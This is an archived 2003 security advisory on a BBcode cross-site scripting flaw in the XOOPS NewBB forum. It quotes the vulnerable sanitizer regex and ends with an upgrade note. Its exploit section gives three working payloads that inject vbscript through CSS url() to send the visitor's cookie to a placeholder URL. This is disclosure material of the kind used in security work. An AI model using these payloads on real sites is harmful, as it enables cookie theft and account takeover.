newbb.txt

newbb.txt: Posted Aug 16, 2003; Authored by Frog Man | Site phpsecure.info; A cross site scripting vulnerability was found in the 1.3.x and below versions of the NewBB PHP forum.; tags | advisory, php, xss; SHA-256 | 00d96f7169f7641a97347e52b62e2660900b9502f3e7ee0e9f0830b0edd7b6c5; Download | Favorite | View

newbb.txt

Informations :
°°°°°°°°°°°°°

Language : PHP
Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
This hole can be used in modules :
- Private Messages
- News
- NewBB (forum)


class/module/textsanitizer.php :

---------------------------------------------------------------------------------------
[...]
function xoopsCodeDecode($text){
$patterns = array();
$replacements = array();
[...]
$patterns[] = "/\[color=(['\"]?)([^\"']*)\\1](.*)\[\/color\]/sU";
$replacements[] = "<span style='color: #\\2;'>\\3</span>";
$patterns[] = "/\[size=(['\"]?)([^\"']*)\\1](.*)\[\/size\]/sU";
$replacements[] = "<span style='font-size: \\2;'>\\3</span>";
$patterns[] = "/\[font=(['\"]?)([^\"']*)\\1](.*)\[\/font\]/sU";
$replacements[] = "<span style='font-family: \\2;'>\\3</span>";
[...]
$text = preg_replace($patterns, $replacements, $text);
[...]
return $text;
}
[...]
function oopsHtmlSpecialChars($text) {
$text = htmlspecialchars($text);
$text = str_replace("'","'",$text);
return $text;
}
[...]
---------------------------------------------------------------------------------------


Exploit :
°°°°°°°

-----------------------------------------------------------------------------------------------------------------------------
[color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]

[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
-----------------------------------------------------------------------------------------------------------------------------

function url() from style tag (css) and vbscript are used here to redirect 
to the url "abcdef" + the cookie with the bbcode tags [color] [size] and 
[font].
Another style function that could be used is expression().

Patch :
°°°°°°
Just download the las version of XOOPS (2.0.3).



frog-m@n
http://www.phpsecure.info

_________________________________________________________________

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

newbb.txt

newbb.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

newbb.txt

Share This

newbb.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems